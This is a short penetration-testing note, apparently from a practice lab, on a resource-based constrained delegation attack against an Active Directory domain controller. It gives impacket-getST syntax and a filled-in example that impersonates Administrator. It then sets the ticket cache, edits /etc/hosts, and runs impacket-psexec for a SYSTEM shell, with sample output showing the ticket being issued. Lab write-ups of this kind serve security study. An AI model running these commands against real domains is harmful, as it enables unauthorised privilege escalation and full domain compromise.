[[rbcd.py]] ```bash # syntax impacket-getST -spn cifs/<DC-computer> <domain>/<attakcer-computer>:<password> -impersonate Administrator -dc-ip $IP # example impacket-getST -spn cifs/resourcedc.resourced.local resourced/wook\$:'wook413' -impersonate Administrator -dc-ip $IP # save the ticket on our kali host as Administrator.ccache export KRB5CCNAME=./Administrator.ccache # add dc in /etc/hosts sudo sh -c 'echo "192.168.120.181 resourcedc.resourced.local" >> /etc/hosts' # psexec to drop into a system shell impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip $IP ``` # example ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-getST -spn cifs/resourcedc.resourced.local resourced/wook\$:'wook413' -impersonate Administrator -dc-ip $IP Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@[email protected] ```